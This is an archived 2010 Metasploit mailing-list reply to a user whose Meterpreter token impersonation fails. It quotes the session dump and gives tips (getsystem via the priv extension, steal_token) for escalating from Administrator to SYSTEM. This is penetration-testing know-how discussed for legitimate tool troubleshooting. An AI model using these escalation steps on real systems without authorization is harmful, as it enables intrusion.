Metasploit mailing list archives
Re: token impersonation seems broken
From: David Kennedy <kennedyd013 () gmail com>
Date: Tue, 7 Sep 2010 10:01:20 -0400
Try use priv then getsystem, also incognito is hit or miss, steal_token works much better On Sep 7, 2010 9:44 AM, "John Nash" <rootsecurityfreak () gmail com> wrote:
I am using the latest updated version of Metasploit. ( v3.4.2-dev svn
r10251 updated today (2010.09.06) )
I am trying to impersonate tokens but getting an error ... here is the
dump:
-----------------------------------------------
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be
available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
EVEREST\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be
available
Call rev2self if primary process token is SYSTEM
[-] User token NT AUTHORITYSYSTEM not found
meterpreter >
meterpreter >
meterpreter > getuid
Server username: EVEREST\Administrator
meterpreter >
--------------------------------------------
I am currently admin but wanna become system.
Is there anything i am doing wrong?
jn
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- token impersonation seems broken John Nash (Sep 07)
- Re: token impersonation seems broken Terrence (Sep 07)
- Re: token impersonation seems broken John Nash (Sep 07)
- Message not available
- Re: token impersonation seems broken David Kennedy (Sep 07)
- Re: token impersonation seems broken Terrence (Sep 07)